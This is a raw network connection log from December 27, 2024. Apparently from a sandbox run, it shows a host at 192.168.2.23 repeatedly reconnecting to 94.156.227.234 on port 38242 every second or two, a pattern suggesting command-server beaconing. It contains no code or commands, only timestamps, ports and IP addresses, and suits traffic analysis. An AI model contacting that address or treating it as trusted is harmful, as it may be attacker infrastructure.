Dec 27, 2024 09:18:05.991770029 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:06.544940948 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:06.545079947 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:06.831542969 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:06.951155901 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:06.951256037 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:06.951282024 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:07.070938110 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:07.454530954 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:07.775765896 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:08.072118998 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:08.072308064 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:08.455322027 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:08.575058937 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:08.575228930 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:08.575270891 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:08.695123911 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:09.079035044 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:09.239739895 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:09.781769991 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:09.782027006 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:10.079916000 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:10.199489117 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:10.199754000 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:10.199783087 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:10.300493002 CET	33608	443	192.168.2.23	54.171.230.55
Dec 27, 2024 09:18:10.319379091 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:10.420195103 CET	443	33608	54.171.230.55	192.168.2.23
Dec 27, 2024 09:18:10.420304060 CET	33608	443	192.168.2.23	54.171.230.55
Dec 27, 2024 09:18:10.704119921 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:10.867773056 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:11.379457951 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:11.379581928 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:11.704993963 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:11.824521065 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:11.824667931 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:11.824668884 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:11.944286108 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:12.329382896 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:12.491841078 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:13.060863018 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:13.060978889 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:13.330288887 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:13.449896097 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:13.450046062 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:13.450093985 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:13.569724083 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:13.953243971 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:14.116067886 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:14.678109884 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:14.678263903 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:14.954214096 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:15.059489012 CET	42836	443	192.168.2.23	91.189.91.43
Dec 27, 2024 09:18:15.073972940 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:15.074085951 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:15.074114084 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:15.194014072 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:15.577691078 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:15.739906073 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:16.242088079 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:16.242221117 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:16.578704119 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:16.698616982 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:16.698771954 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:16.698813915 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:16.818372011 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:17.202825069 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:17.364094019 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:17.848983049 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:17.849179029 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:18.203795910 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:18.323368073 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:18.323643923 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:18.323661089 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:18.443402052 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:18.829308987 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:18.991758108 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:19.496860027 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:19.496980906 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:19.830387115 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:19.949996948 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:19.950068951 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:19.950103998 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:20.069705009 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:20.453438044 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:20.615768909 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:21.149815083 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:21.149878025 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:21.202584028 CET	42516	80	192.168.2.23	109.202.202.202
Dec 27, 2024 09:18:21.454302073 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:21.573913097 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:21.574004889 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:21.574004889 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:21.693501949 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:22.078824043 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:22.239753008 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:22.790735960 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:22.790823936 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:23.079869032 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:23.199461937 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:23.199548960 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:23.199578047 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:23.319176912 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:23.703504086 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:23.867831945 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:24.415211916 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:24.415292978 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:24.704986095 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:24.824512005 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:24.824613094 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:24.824700117 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:24.944259882 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:25.328389883 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:25.491794109 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:26.329184055 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:26.452559948 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:26.452660084 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:26.452677011 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:26.452714920 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:26.456098080 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:26.456162930 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:26.456207037 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:26.572463036 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:26.577511072 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:26.959872007 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:27.119821072 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:27.587836981 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:27.587917089 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:27.960951090 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:28.080554962 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:28.080709934 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:28.080775023 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:28.200361967 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:28.585182905 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:28.747806072 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:29.207242012 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:29.207340956 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:29.586350918 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:29.705905914 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:29.705991983 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:29.706027985 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:29.825653076 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:30.210325003 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:30.371876001 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:30.910399914 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:30.910470963 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:31.211319923 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:31.331111908 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:31.331216097 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:31.331362963 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:31.450798988 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:31.835256100 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:31.995750904 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:32.487236023 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:32.487340927 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:32.836352110 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:32.955841064 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:32.956175089 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:32.956175089 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:33.075875998 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:33.460577011 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:33.623903990 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:34.109853983 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:34.110080957 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:34.461561918 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:34.581008911 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:34.581163883 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:34.581207991 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:34.700711966 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:35.086139917 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:35.247867107 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:35.843866110 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:35.844022989 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:36.087198019 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:36.206717968 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:36.206882000 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:36.206893921 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:36.326334953 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:36.710412979 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:36.871809959 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:37.422638893 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:37.422801971 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:37.711441040 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:37.830914021 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:37.831109047 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:37.831127882 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:37.950697899 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:38.337030888 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:38.499804020 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:38.992510080 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:38.992717981 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:39.338464975 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:39.457957983 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:39.458049059 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:39.458102942 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:39.577557087 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:39.964117050 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:40.123945951 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:40.659904957 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:40.660017967 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:40.965076923 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:41.084685087 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:41.084884882 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:41.084913969 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:41.204468012 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:41.590805054 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:41.751827955 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:42.254852057 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:42.254973888 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:42.592694044 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:42.712308884 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:42.712438107 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:42.712510109 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:42.832107067 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:43.218494892 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:43.383841991 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:43.727464914 CET	43928	443	192.168.2.23	91.189.91.42
Dec 27, 2024 09:18:44.141973019 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:44.142036915 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:44.220016003 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:44.382143974 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:44.382230043 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:44.382262945 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:44.501682043 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:44.886508942 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:45.047789097 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:45.533778906 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:45.533899069 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:45.887955904 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:46.007524967 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:46.007658005 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:46.007674932 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:46.270575047 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:46.512341976 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:46.675864935 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:47.267925024 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:47.268007040 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:47.513834000 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:47.633415937 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:47.633501053 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:47.633672953 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:47.753267050 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:48.139246941 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:48.299958944 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:48.798787117 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:48.798858881 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:49.140599966 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:49.260273933 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:49.260385990 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:49.260509014 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:49.379956961 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:49.765516996 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:49.991863012 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:50.449688911 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:50.449898005 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:50.766699076 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:50.886193037 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:50.886280060 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:50.886324883 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:51.006016016 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:51.392287016 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:51.551882982 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:52.074583054 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:52.074760914 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:52.393951893 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:52.513551950 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:52.513845921 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:52.513845921 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:52.633332014 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:53.019890070 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:53.179862976 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:53.651423931 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:53.651868105 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:54.021115065 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:54.140691042 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:54.140894890 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:54.140948057 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:54.260497093 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:54.645477057 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:54.807889938 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:55.281328917 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:55.281416893 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:55.647053957 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:55.766552925 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:55.766654015 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:55.766705036 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:55.886272907 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:56.273463011 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:56.435817003 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:56.965406895 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:56.965660095 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:57.275125027 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:57.394577980 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:57.394691944 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:57.394773960 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:57.514273882 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:57.900115013 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:58.059943914 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:58.553270102 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:58.553682089 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:58.901134014 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:59.386595011 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:59.386692047 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:59.386868954 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:59.507328033 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:59.891468048 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:00.052021980 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:00.546148062 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:00.546257019 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:00.892575979 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:01.012207031 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:01.012291908 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:01.012310982 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:01.132159948 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:01.516590118 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:01.679869890 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:02.180896997 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:02.181024075 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:02.517548084 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:02.637528896 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:02.637712955 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:02.637875080 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:02.757487059 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:03.141438961 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:03.303864002 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:03.773307085 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:03.773418903 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:04.142652988 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:04.323549986 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:04.323662043 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:04.323690891 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:04.443854094 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:04.827299118 CET	60102	38242	192.168.2.23	94.156.227.234
